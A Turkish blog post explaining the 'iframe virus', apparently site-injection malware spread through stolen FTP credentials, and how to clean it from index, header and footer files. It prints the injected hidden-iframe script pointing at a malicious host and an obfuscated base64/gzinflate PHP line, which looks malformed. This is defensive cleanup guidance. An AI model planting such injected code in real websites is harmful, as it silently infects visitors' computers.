iframe Virüsü

<script type="text/javascript"> document.write ('<iframe src="http:pinkium,ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2" /iframe>'); /script

Sitenizin kaynak kodlarında yukarıdakine benzer bir kod görüyorsanız sitenizde iframe virüsü bulunduğu anlamına gelir.

iframe Virüsü (post hacking) Nedir?

iframe virüsü günümuzün trend viruslerinden olup kullanıcı bilgisayarına bulaştıktan sonra ilgili bilgisayar üzerinden yapılan ftp baglantıları aracılığıyla web sitelerinin anasayfalarına (index.htm,index.php,default.asp …) javascript veya iframe etiketi kullanarak zararli Java Appletler dahil etmektedir.
Bu atak sonrası ilgili siteyi ziyaret eden bir kullanıcı farkına varmadan bilgisayarı üzerinde kötü amaçlara hizmet eden bir Java Applet calıştığının farkına varamıyor dolayisiyla ilgili pc bulunduğu networkde bir zombie haline de gelebiliyor. Bunu önlemek adina mevcut arama motorlari (google,yahoo vb) zararlı kod tespit ettiği siteye kendi üzerinden kimseninin giriş yapmaması için

“Bu site bilgisayariniza zarar verebilir” şeklinde bir uyarı ile uyariyor.

iframe Virüsü Nasıl Temizlenir?

Herşeyden önce kişisel bilgisayarınızda yapmanız gerekenler
1- Kullanılan işletim sisteminin (kisisel bilgisayarin) tum update,patch,hotfixlerinin yapılması.
2- internete çıkılan web browserin güncel versiyonunun kullanılması, varsa gerekli yamalarin yapilmasi.
3 -Devamli virus veritabanini guncelleyen lisansli bir antivirus yazilimi kullanilmasi.

Ftp Alanından iframe Virüsünü Temizleme

index.php, header.php, footer.php gibi dosyalarınızda aşağıdakine benzer kodlar arayın ve temizleyin. Sorun çözülecektir.

<script type=”text/javascript“> document.write(‘iframe src=”http://pinkium,ru/in.cgi?16″ name=”Twitter” scrolling=”auto” frameborder=”no” align=”center” height=”2″ width=”2″>/iframe’); </script

Kaynak kodlarınızda search yaptığınızda yukarıdaki gibi bir kod bulamıyorsanız ilgili iframe scripti encrypted olarak eklenmiş demektir. Bu durumda aşağıdaki gibi bir kod bloğu arayın.

Aşağıda base64 ile encrypt edilmiş bir iframe virüsü kod bloğunu görebilirsiniz.

#c 3284d #
echo(gzinflate(base64_decode(“3Y5BKMK0XoHMpvq pkQXLhTwEl4AAWFMCw2dit5eam/hrCb//3nzGfuPEbPJOBGjz+QkkHsTf+qX3lRQbWOTWUYXqS8Zye06gY+ sR8fmbCQEounMeQnKOKOKOXg8nYLEGJdwKErkMrELTM GD0EvRCCdiPdE/0K00P6KMEU/+tB8GhIJKMKMIIMKLMLMqvg==”)));
#/c3284d #

Virüsü temizledikten sonra ftp şifrenizi mutlaka değiştirin.
Not: Virus tespit edilen sitede ilgili zararli kodlar temizlendigin de Google ve Web tarayicilari belli bir süre sonra ilgili tehlike mesajini vermeyeceklerdir.

(bir kısmı alıntıdır)

About Emre BAŞTUĞ

Emre BAŞTUĞ